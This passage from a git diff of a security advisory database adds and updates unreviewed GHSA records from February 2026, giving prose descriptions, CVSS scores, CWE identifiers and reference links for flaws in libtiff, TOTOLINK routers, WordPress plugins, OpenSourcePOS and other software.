"id": "GHSA-75j9-8g79-fp7r", + "modified": "2026-02-23T21:31:26Z", + "published": "2026-02-23T21:31:26Z", + "aliases": [ + "CVE-2025-61146" + ], + "details": "saitoha libsixel until v1.8.7 was discovered to contain a memory leak via the component malloc_stub.c.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-61146" + }, + { + "type": "WEB", + "url": "https://github.com/saitoha/libsixel/issues/207" + }, + { + "type": "WEB", + "url": "https://github.com/saitoha/libsixel/commit/e0ba6685262a3679cc5b9009c0c5b7dc8a3f262e" + }, + { + "type": "WEB", + "url": "https://gist.github.com/optionGo/1100e5be05c5558501a95f5e99160584" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-401" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-23T19:22:56Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-7mg3-vfc7-xvch/GHSA-7mg3-vfc7-xvch.json b/advisories/unreviewed/2026/02/GHSA-7mg3-vfc7-xvch/GHSA-7mg3-vfc7-xvch.json new file mode 100644 index 0000000000000..9ac214368c59e --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-7mg3-vfc7-xvch/GHSA-7mg3-vfc7-xvch.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-7mg3-vfc7-xvch", + "modified": "2026-02-23T21:31:27Z", + "published": "2026-02-23T21:31:27Z", + "aliases": [ + "CVE-2026-23694" + ], + "details": "Aruba HiSpeed Cache (aruba-hispeed-cache) WordPress plugin versions prior to 3.0.5 contain a cross-site request forgery (CSRF) vulnerability affecting multiple administrative AJAX actions. The handlers for ahsc_reset_options, ahsc_debug_status, and ahsc_enable_purge perform authentication and capability checks but do not verify a WordPress nonce for state-changing requests. An attacker can induce a logged-in administrator to visit a malicious webpage that submits forged requests to admin-ajax.php, resulting in unauthorized resetting of plugin settings, toggling of the WordPress WP_DEBUG configuration, or modification of cache purging behavior without the administrator’s intent.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23694" + }, + { + "type": "WEB", + "url": "https://hosting.aruba.it/en/wordpress.aspx" + }, + { + "type": "WEB", + "url": "https://wordpress.org/plugins/aruba-hispeed-cache" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-352" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-23T21:19:10Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-8gq5-mm3m-7h4x/GHSA-8gq5-mm3m-7h4x.json b/advisories/unreviewed/2026/02/GHSA-8gq5-mm3m-7h4x/GHSA-8gq5-mm3m-7h4x.json index 75d8610497366..b43fbe851c532 100644 --- a/advisories/unreviewed/2026/02/GHSA-8gq5-mm3m-7h4x/GHSA-8gq5-mm3m-7h4x.json +++ b/advisories/unreviewed/2026/02/GHSA-8gq5-mm3m-7h4x/GHSA-8gq5-mm3m-7h4x.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-8gq5-mm3m-7h4x", - "modified": "2026-02-23T00:30:26Z", + "modified": "2026-02-23T21:31:25Z", "published": "2026-02-23T00:30:26Z", "aliases": [ "CVE-2026-2588" ], "details": "Crypt::NaCl::Sodium versions through 2.001 for Perl has an integer overflow flaw on 32-bit systems.\n\nSodium.xs casts a STRLEN (size_t) to unsigned long long when passing a length pointer to libsodium functions. On 32-bit systems size_t is typically 32-bits while an unsigned long long is at least 64-bits.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H" + } + ], "affected": [], "references": [ { @@ -31,7 +36,7 @@ "cwe_ids": [ "CWE-190" ], - "severity": null, + "severity": "CRITICAL", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-23T00:15:59Z" diff --git a/advisories/unreviewed/2026/02/GHSA-8p85-wjp4-3w4m/GHSA-8p85-wjp4-3w4m.json b/advisories/unreviewed/2026/02/GHSA-8p85-wjp4-3w4m/GHSA-8p85-wjp4-3w4m.json index 7a16e09527da0..3e504a74c51f0 100644 --- a/advisories/unreviewed/2026/02/GHSA-8p85-wjp4-3w4m/GHSA-8p85-wjp4-3w4m.json +++ b/advisories/unreviewed/2026/02/GHSA-8p85-wjp4-3w4m/GHSA-8p85-wjp4-3w4m.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-8p85-wjp4-3w4m", - "modified": "2026-02-20T18:31:40Z", + "modified": "2026-02-23T21:31:24Z", "published": "2026-02-20T18:31:39Z", "aliases": [ "CVE-2026-26746" ], "details": "OpenSourcePOS 3.4.1 contains a Local File Inclusion (LFI) vulnerability in the Sales.php::getInvoice() function. An attacker can read arbitrary files on the web server by manipulating the Invoice Type configuration. This issue can be chained with the file upload functionality to achieve Remote Code Execution (RCE).", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], "affected": [], "references": [ { @@ -24,8 +29,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-434" + ], + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-20T17:25:55Z" diff --git a/advisories/unreviewed/2026/02/GHSA-8x43-j6j7-q6vg/GHSA-8x43-j6j7-q6vg.json b/advisories/unreviewed/2026/02/GHSA-8x43-j6j7-q6vg/GHSA-8x43-j6j7-q6vg.json index 633222197720a..ce1d3350d15be 100644 --- a/advisories/unreviewed/2026/02/GHSA-8x43-j6j7-q6vg/GHSA-8x43-j6j7-q6vg.json +++ b/advisories/unreviewed/2026/02/GHSA-8x43-j6j7-q6vg/GHSA-8x43-j6j7-q6vg.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-8x43-j6j7-q6vg", - "modified": "2026-02-20T18:31:39Z", + "modified": "2026-02-23T21:31:23Z", "published": "2026-02-20T18:31:39Z", "aliases": [ "CVE-2026-26723" ], "details": "Cross Site Scripting vulnerability in Key Systems Inc Global Facilities Management Software v. 20230721a allows a remote attacker to execute arbitrary code via the function parameter.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N" + } + ], "affected": [], "references": [ { @@ -20,8 +25,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-79" + ], + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-20T17:25:55Z" diff --git a/advisories/unreviewed/2026/02/GHSA-9636-r3rx-jw83/GHSA-9636-r3rx-jw83.json b/advisories/unreviewed/2026/02/GHSA-9636-r3rx-jw83/GHSA-9636-r3rx-jw83.json index fc8140d0786e0..e3a31d70bde99 100644 --- a/advisories/unreviewed/2026/02/GHSA-9636-r3rx-jw83/GHSA-9636-r3rx-jw83.json +++ b/advisories/unreviewed/2026/02/GHSA-9636-r3rx-jw83/GHSA-9636-r3rx-jw83.json @@ -1,13 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-9636-r3rx-jw83", - "modified": "2026-02-19T18:31:54Z", + "modified": "2026-02-23T21:31:22Z", "published": "2026-02-19T18:31:54Z", "aliases": [ "CVE-2026-2736" ], "details": "Reflected Cross-site Scripting (XSS) in Alkacon's OpenCms v18.0, which allows an attacker to execute JavaScript code in the victim's browser by sending the victim a malicious URL containing the ‘q’ parameter in ‘/search/index.html’. This vulnerability can be exploited to steal sensitive user information such as session cookies, or to perform actions while impersonating the user.", "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" diff --git a/advisories/unreviewed/2026/02/GHSA-c4qg-fgx5-7xg5/GHSA-c4qg-fgx5-7xg5.json b/advisories/unreviewed/2026/02/GHSA-c4qg-fgx5-7xg5/GHSA-c4qg-fgx5-7xg5.json index 9e49477964163..181477942f31f 100644 --- a/advisories/unreviewed/2026/02/GHSA-c4qg-fgx5-7xg5/GHSA-c4qg-fgx5-7xg5.json +++ b/advisories/unreviewed/2026/02/GHSA-c4qg-fgx5-7xg5/GHSA-c4qg-fgx5-7xg5.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-c4qg-fgx5-7xg5", - "modified": "2026-02-20T18:31:39Z", + "modified": "2026-02-23T21:31:23Z", "published": "2026-02-20T18:31:39Z", "aliases": [ "CVE-2026-26722" ], "details": "An issue in Key Systems Inc Global Facilities Management Software v.20230721a allows a remote attacker to escalate privileges via PIN component of the login functionality.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:H" + } + ], "affected": [], "references": [ { @@ -20,8 +25,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-269" + ], + "severity": "CRITICAL", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-20T17:25:55Z" diff --git a/advisories/unreviewed/2026/02/GHSA-cf6f-74jc-gm3q/GHSA-cf6f-74jc-gm3q.json b/advisories/unreviewed/2026/02/GHSA-cf6f-74jc-gm3q/GHSA-cf6f-74jc-gm3q.json index 728e7288599ed..ad9f50279ae51 100644 --- a/advisories/unreviewed/2026/02/GHSA-cf6f-74jc-gm3q/GHSA-cf6f-74jc-gm3q.json +++ b/advisories/unreviewed/2026/02/GHSA-cf6f-74jc-gm3q/GHSA-cf6f-74jc-gm3q.json @@ -29,7 +29,9 @@ } ], "database_specific": { - "cwe_ids": [], + "cwe_ids": [ + "CWE-22" + ], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2026/02/GHSA-f565-6pjw-3whr/GHSA-f565-6pjw-3whr.json b/advisories/unreviewed/2026/02/GHSA-f565-6pjw-3whr/GHSA-f565-6pjw-3whr.json index 9d5c56f007d84..f0da85e624ea5 100644 --- a/advisories/unreviewed/2026/02/GHSA-f565-6pjw-3whr/GHSA-f565-6pjw-3whr.json +++ b/advisories/unreviewed/2026/02/GHSA-f565-6pjw-3whr/GHSA-f565-6pjw-3whr.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-f565-6pjw-3whr", - "modified": "2026-02-22T06:30:17Z", + "modified": "2026-02-23T21:31:25Z", "published": "2026-02-22T06:30:17Z", "aliases": [ "CVE-2026-1369" ], "details": "The Conditional CAPTCHA WordPress plugin through 4.0.0 does not validate a parameter before redirecting the user to its value, leading to an Open Redirect issue", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N" + } + ], "affected": [], "references": [ { @@ -20,8 +25,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-601" + ], + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-22T06:16:02Z" diff --git a/advisories/unreviewed/2026/02/GHSA-f8w4-9vp9-7v2q/GHSA-f8w4-9vp9-7v2q.json b/advisories/unreviewed/2026/02/GHSA-f8w4-9vp9-7v2q/GHSA-f8w4-9vp9-7v2q.json new file mode 100644 index 0000000000000..01ca14538bb16 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-f8w4-9vp9-7v2q/GHSA-f8w4-9vp9-7v2q.json @@ -0,0 +1,37 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-f8w4-9vp9-7v2q", + "modified": "2026-02-23T21:31:27Z", + "published": "2026-02-23T21:31:27Z", + "aliases": [ + "CVE-2025-71056" + ], + "details": "Improper session management in GCOM EPON 1GE ONU version C00R371V00B01 allows attackers to execute a session hijacking attack via spoofing the IP address of an authenticated user.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-71056" + }, + { + "type": "WEB", + "url": "https://github.com/theShinigami/CVE-Disclosures/blob/main/CVE-2025-71056/README.md" + }, + { + "type": "WEB", + "url": "https://johnbai.en.made-in-china.com/product/JXnENzmlJFpv/China-H18gn-Series-Gpon-Ont-ONU.html" + }, + { + "type": "WEB", + "url": "http://www.szgcom.com" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-23T21:19:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-fqqc-4836-hph4/GHSA-fqqc-4836-hph4.json b/advisories/unreviewed/2026/02/GHSA-fqqc-4836-hph4/GHSA-fqqc-4836-hph4.json new file mode 100644 index 0000000000000..c3b6f82c90415 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-fqqc-4836-hph4/GHSA-fqqc-4836-hph4.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-fqqc-4836-hph4", + "modified": "2026-02-23T21:31:27Z", + "published": "2026-02-23T21:31:27Z", + "aliases": [ + "CVE-2025-63946" + ], + "details": "A privilege escalation (PE) vulnerability in the Tencent PC Manager app thru 17.10.28554.205 on Windows devices enables a local user to execute programs with elevated privileges. However, execution requires that the local user is able to successfully exploit a race condition.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-63946" + }, + { + "type": "WEB", + "url": "https://github.com/alexlee820/CVE-2025-63946-Tencent-PC-Manager-EoP/blob/main/README.md" + }, + { + "type": "WEB", + "url": "https://github.com/alexlee820/Tencent-PC-Manager-EoP" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-59" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-23T20:28:53Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-fqrw-hvqv-r58w/GHSA-fqrw-hvqv-r58w.json b/advisories/unreviewed/2026/02/GHSA-fqrw-hvqv-r58w/GHSA-fqrw-hvqv-r58w.json index 7ef6368fe1d80..3f54f94f5270e 100644 --- a/advisories/unreviewed/2026/02/GHSA-fqrw-hvqv-r58w/GHSA-fqrw-hvqv-r58w.json +++ b/advisories/unreviewed/2026/02/GHSA-fqrw-hvqv-r58w/GHSA-fqrw-hvqv-r58w.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-fqrw-hvqv-r58w", - "modified": "2026-02-20T18:31:40Z", + "modified": "2026-02-23T21:31:24Z", "published": "2026-02-20T18:31:39Z", "aliases": [ "CVE-2026-26745" ], "details": "OpenSourcePOS 3.4.1 has a second order SQL Injection vulnerability in the handling of the currency_symbol configuration field. Although the input is initially stored without immediate execution, it is later concatenated into a dynamically constructed SQL query without proper sanitization or parameter binding. This allows an attacker with access to modify the currency_symbol value to inject arbitrary SQL expressions, which are executed when the affected query is subsequently processed.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N" + } + ], "affected": [], "references": [ { @@ -24,8 +29,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-89" + ], + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-20T17:25:55Z" diff --git a/advisories/unreviewed/2026/02/GHSA-h2mx-ppvp-v2rq/GHSA-h2mx-ppvp-v2rq.json b/advisories/unreviewed/2026/02/GHSA-h2mx-ppvp-v2rq/GHSA-h2mx-ppvp-v2rq.json index 7be7206499ed6..c41d63ba633ab 100644 --- a/advisories/unreviewed/2026/02/GHSA-h2mx-ppvp-v2rq/GHSA-h2mx-ppvp-v2rq.json +++ b/advisories/unreviewed/2026/02/GHSA-h2mx-ppvp-v2rq/GHSA-h2mx-ppvp-v2rq.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-h2mx-ppvp-v2rq", - "modified": "2026-02-23T18:32:02Z", + "modified": "2026-02-23T21:31:26Z", "published": "2026-02-23T18:32:02Z", "aliases": [ "CVE-2025-70045" ], "details": "An issue pertaining to CWE-295: Improper Certificate Validation was discovered in jxcore jxm master. The application disables TLS/SSL certificate validation by setting 'rejectUnauthorized': false in HTTPS request options when 'jx_obj.IsSecure' is true", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N" + } + ], "affected": [], "references": [ { @@ -28,8 +33,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-295" + ], + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-23T16:29:36Z" diff --git a/advisories/unreviewed/2026/02/GHSA-h4x3-hcxh-84cx/GHSA-h4x3-hcxh-84cx.json b/advisories/unreviewed/2026/02/GHSA-h4x3-hcxh-84cx/GHSA-h4x3-hcxh-84cx.json new file mode 100644 index 0000000000000..3235fce75e252 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-h4x3-hcxh-84cx/GHSA-h4x3-hcxh-84cx.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-h4x3-hcxh-84cx", + "modified": "2026-02-23T21:31:27Z", + "published": "2026-02-23T21:31:27Z", + "aliases": [ + "CVE-2025-70329" + ], + "details": "TOTOLink X5000R v9.1.0cu_2415_B20250515 contains an OS command injection vulnerability in the setIptvCfg handler of the /usr/sbin/lighttpd executable. The vlanVidLan1 (and other vlanVidLanX) parameters are retrieved via Uci_Get_Str and passed to the CsteSystem function without adequate validation or filtering. This allows an authenticated attacker to execute arbitrary shell commands with root privileges by injecting shell metacharacters into the affected parameters.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-70329" + }, + { + "type": "WEB", + "url": "https://github.com/neighborhood-H/0-DAY/blob/main/Toto-link/X5000R/SetIptvCfg/report.md" + }, + { + "type": "WEB", + "url": "https://www.notion.so/TOTOLINK-X5000R-SetIptvCfg-2d170566ca7f8027ad47e6b5429025fc?source=copy_link" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-78" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-23T20:28:53Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-h93r-xq5m-hv3w/GHSA-h93r-xq5m-hv3w.json b/advisories/unreviewed/2026/02/GHSA-h93r-xq5m-hv3w/GHSA-h93r-xq5m-hv3w.json index bfd7ac10f2ae4..42c848ad80e26 100644 --- a/advisories/unreviewed/2026/02/GHSA-h93r-xq5m-hv3w/GHSA-h93r-xq5m-hv3w.json +++ b/advisories/unreviewed/2026/02/GHSA-h93r-xq5m-hv3w/GHSA-h93r-xq5m-hv3w.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-h93r-xq5m-hv3w", - "modified": "2026-02-20T18:31:39Z", + "modified": "2026-02-23T21:31:24Z", "published": "2026-02-20T18:31:39Z", "aliases": [ "CVE-2026-26725" ], "details": "An issue in edu Business Solutions Print Shop Pro WebDesk v.18.34 allows a remote attacker to escalate privileges via the AccessID parameter.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], "affected": [], "references": [ { @@ -20,8 +25,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-269" + ], + "severity": "CRITICAL", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-20T17:25:55Z" diff --git a/advisories/unreviewed/2026/02/GHSA-jqhg-j5gv-hpmr/GHSA-jqhg-j5gv-hpmr.json b/advisories/unreviewed/2026/02/GHSA-jqhg-j5gv-hpmr/GHSA-jqhg-j5gv-hpmr.json new file mode 100644 index 0000000000000..3a60b81243dc6 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-jqhg-j5gv-hpmr/GHSA-jqhg-j5gv-hpmr.json @@ -0,0 +1,33 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-jqhg-j5gv-hpmr", + "modified": "2026-02-23T21:31:27Z", + "published": "2026-02-23T21:31:27Z", + "aliases": [ + "CVE-2025-70328" + ], + "details": "TOTOLINK X6000R v9.4.0cu.1498_B20250826 contains an OS command injection vulnerability in the NTPSyncWithHost handler of the /usr/sbin/shttpd executable. The host_time parameter is retrieved via sub_40C404 and passed to a date -s shell command through CsteSystem. While the first two tokens of the input are validated, the remainder of the string is not sanitized, allowing authenticated attackers to execute arbitrary shell commands via shell metacharacters.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-70328" + }, + { + "type": "WEB", + "url": "https://github.com/neighborhood-H/0-DAY/blob/main/Toto-link/X6000R/NTPSyncWihtHost/report.md" + }, + { + "type": "WEB", + "url": "https://www.notion.so/TOTOLINK-X6000R-NTPSyncWithHost-2d170566ca7f803a8096c1b31b2ed42f?source=copy_link" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-23T21:19:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-m6xw-mq4p-x7xv/GHSA-m6xw-mq4p-x7xv.json b/advisories/unreviewed/2026/02/GHSA-m6xw-mq4p-x7xv/GHSA-m6xw-mq4p-x7xv.json new file mode 100644 index 0000000000000..701e8553a46c4 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-m6xw-mq4p-x7xv/GHSA-m6xw-mq4p-x7xv.json @@ -0,0 +1,45 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-m6xw-mq4p-x7xv", + "modified": "2026-02-23T21:31:26Z", + "published": "2026-02-23T21:31:26Z", + "aliases": [ + "CVE-2025-61144" + ], + "details": "libtiff up to v4.7.1 was discovered to contain a stack overflow via the readSeparateStripsIntoBuffer function.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-61144" + }, + { + "type": "WEB", + "url": "https://gist.github.com/optionGo/5ad17e96a0a40f03578dd6c9f8645952" + }, + { + "type": "WEB", + "url": "https://gitlab.com/libtiff/libtiff/-/commit/09f53a86cf26dfd961925227e59e180db617f26d" + }, + { + "type": "WEB", + "url": "https://gitlab.com/libtiff/libtiff/-/commit/88cf9dbb48f6e172629795ecffae35d5052f68aa" + }, + { + "type": "WEB", + "url": "https://gitlab.com/libtiff/libtiff/-/issues/740" + }, + { + "type": "WEB", + "url": "https://gitlab.com/libtiff/libtiff/-/merge_requests/757" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-23T19:22:56Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-p5gf-vhgm-432f/GHSA-p5gf-vhgm-432f.json b/advisories/unreviewed/2026/02/GHSA-p5gf-vhgm-432f/GHSA-p5gf-vhgm-432f.json index 728309edfa2e2..f06de64dd27e3 100644 --- a/advisories/unreviewed/2026/02/GHSA-p5gf-vhgm-432f/GHSA-p5gf-vhgm-432f.json +++ b/advisories/unreviewed/2026/02/GHSA-p5gf-vhgm-432f/GHSA-p5gf-vhgm-432f.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-p5gf-vhgm-432f", - "modified": "2026-02-19T18:31:54Z", + "modified": "2026-02-23T21:31:22Z", "published": "2026-02-19T18:31:54Z", "aliases": [ "CVE-2025-15559" ], "details": "An unauthenticated attacker can inject OS commands when calling a server API endpoint in NesterSoft WorkTime. The server API call to generate and download the WorkTime client from the WorkTime server is vulnerable in the “guid” parameter. This allows an attacker to execute arbitrary commands on the WorkTime server as NT Authority\\SYSTEM with the highest privileges. Attackers are able to access or manipulate sensitive data and take over the whole server.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], "affected": [], "references": [ { @@ -23,7 +28,7 @@ "cwe_ids": [ "CWE-78" ], - "severity": null, + "severity": "CRITICAL", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-19T11:15:55Z" diff --git a/advisories/unreviewed/2026/02/GHSA-p884-v7p5-5858/GHSA-p884-v7p5-5858.json b/advisories/unreviewed/2026/02/GHSA-p884-v7p5-5858/GHSA-p884-v7p5-5858.json new file mode 100644 index 0000000000000..d38c45d2cd16e --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-p884-v7p5-5858/GHSA-p884-v7p5-5858.json @@ -0,0 +1,37 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-p884-v7p5-5858", + "modified": "2026-02-23T21:31:26Z", + "published": "2026-02-23T21:31:26Z", + "aliases": [ + "CVE-2025-61143" + ], + "details": "libtiff up to v4.7.1 was discovered to contain a NULL pointer dereference via the component libtiff/tif_open.c.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-61143" + }, + { + "type": "WEB", + "url": "https://gist.github.com/optionGo/9c024cd8e7b131463b84dc60af9bb0aa" + }, + { + "type": "WEB", + "url": "https://gitlab.com/libtiff/libtiff/-/issues/737" + }, + { + "type": "WEB", + "url": "https://gitlab.com/libtiff/libtiff/-/merge_requests/755" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-23T19:22:56Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-p8m9-mjw8-hvvx/GHSA-p8m9-mjw8-hvvx.json b/advisories/unreviewed/2026/02/GHSA-p8m9-mjw8-hvvx/GHSA-p8m9-mjw8-hvvx.json index 4d6ff1e284dfc..43c601b6029c1 100644 --- a/advisories/unreviewed/2026/02/GHSA-p8m9-mjw8-hvvx/GHSA-p8m9-mjw8-hvvx.json +++ b/advisories/unreviewed/2026/02/GHSA-p8m9-mjw8-hvvx/GHSA-p8m9-mjw8-hvvx.json @@ -46,7 +46,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-74" + "CWE-74", + "CWE-89" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2026/02/GHSA-p9m7-fwrr-649p/GHSA-p9m7-fwrr-649p.json b/advisories/unreviewed/2026/02/GHSA-p9m7-fwrr-649p/GHSA-p9m7-fwrr-649p.json new file mode 100644 index 0000000000000..6eda65c4b00c6 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-p9m7-fwrr-649p/GHSA-p9m7-fwrr-649p.json @@ -0,0 +1,33 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-p9m7-fwrr-649p", + "modified": "2026-02-23T21:31:27Z", + "published": "2026-02-23T21:31:27Z", + "aliases": [ + "CVE-2025-70327" + ], + "details": "TOTOLINK X5000R v9.1.0cu_2415_B20250515 contains an argument injection vulnerability in the setDiagnosisCfg handler of the /usr/sbin/lighttpd executable. The ip parameter is retrieved via websGetVar and passed to a ping command through CsteSystem without validating if the input starts with a hyphen (-). This allows remote authenticated attackers to inject arbitrary command-line options into the ping utility, potentially leading to a Denial of Service (DoS) by causing excessive resource consumption or prolonged execution.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-70327" + }, + { + "type": "WEB", + "url": "https://github.com/neighborhood-H/0-DAY/blob/main/Toto-link/X5000R/SetDiagnosisCfg/report.md" + }, + { + "type": "WEB", + "url": "https://www.notion.so/TOTOLINK-X5000R-SetDiagnosisCfg-2d170566ca7f8098a0bcee9f2a15d40d?source=copy_link" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": 